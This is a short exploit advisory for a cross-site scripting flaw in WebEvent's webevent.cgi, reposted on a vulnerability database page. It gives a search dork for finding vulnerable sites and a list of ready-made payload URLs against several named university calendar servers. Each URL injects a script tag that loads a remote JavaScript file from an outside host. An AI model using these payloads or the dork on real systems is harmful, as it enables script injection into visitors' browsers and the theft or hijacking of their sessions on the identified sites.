Lucene search
webevent-xss.txt
WebEvent webevent.cgi Cross-Site Scripting Vulnerability in WebEvent 2.61, 2.7, 2.71, 2.72, and 4.03 version
Show more
`
# Title : WebEvent(tm) webevent.cgi Cross-Site Scripting Vulnerability
# Description : WebEvent(tm) is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
# Software : http://www.webevent.com/
# Author : d3hydr8
# Contact : d3hydr8[at]gmail[dot]com
# Original Post : http://forum.darkc0de.com/index.php?action=vthread&forum=12&topic=184
# Dork : intext:"Powered by WebEvent (tm)." inurl:"/webevent.cgi"
# Greets : mozi, whoami, icqbomber
#Proof :
http://w4.eku.edu/cgi-bin/webevent/webevent.cgi?cmd=%22%3CSCRIPT+SRC=http://www.darkc0de.com/xss.js%3E%3C/SCRIPT%3E
WebEvent 2.61
http://calendar.purdue.edu/cgi-bin/webevent.cgi?cmd=%22%3CSCRIPT+SRC=http://www.darkc0de.com/xss.js%3E%3C/SCRIPT%3E
WebEvent 2.7
http://webcal.usf.edu/cgi-bin/webevent.cgi?cmd=%22%3CSCRIPT+SRC=http://www.darkc0de.com/xss.js%3E%3C/SCRIPT%3E
WebEvent 2.71
http://events.haas.berkeley.edu/webevent.cgi?cmd=%22%3CSCRIPT+SRC=http://www.darkc0de.com/xss.js%3E%3C/SCRIPT%3E
WebEvent 2.72
http://research.yale.edu/cgi-bin/mcdougal/publish2.72/webevent.cgi?cmd=%22%3CSCRIPT+SRC=http://www.darkc0de.com/xss.js%3E%3C/SCRIPT%3E
WebEvent 2.72
http://ic-server02.info-commons.uiowa.edu/cgi-bin/webevent.cgi?cmd=%22%3CSCRIPT+SRC=http://www.darkc0de.com/xss.js%3E%3C/SCRIPT%3E
WebEvent 4.03
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo31 Jul 2007 00:00Current
7.4High risk
Vulners AI Score7.4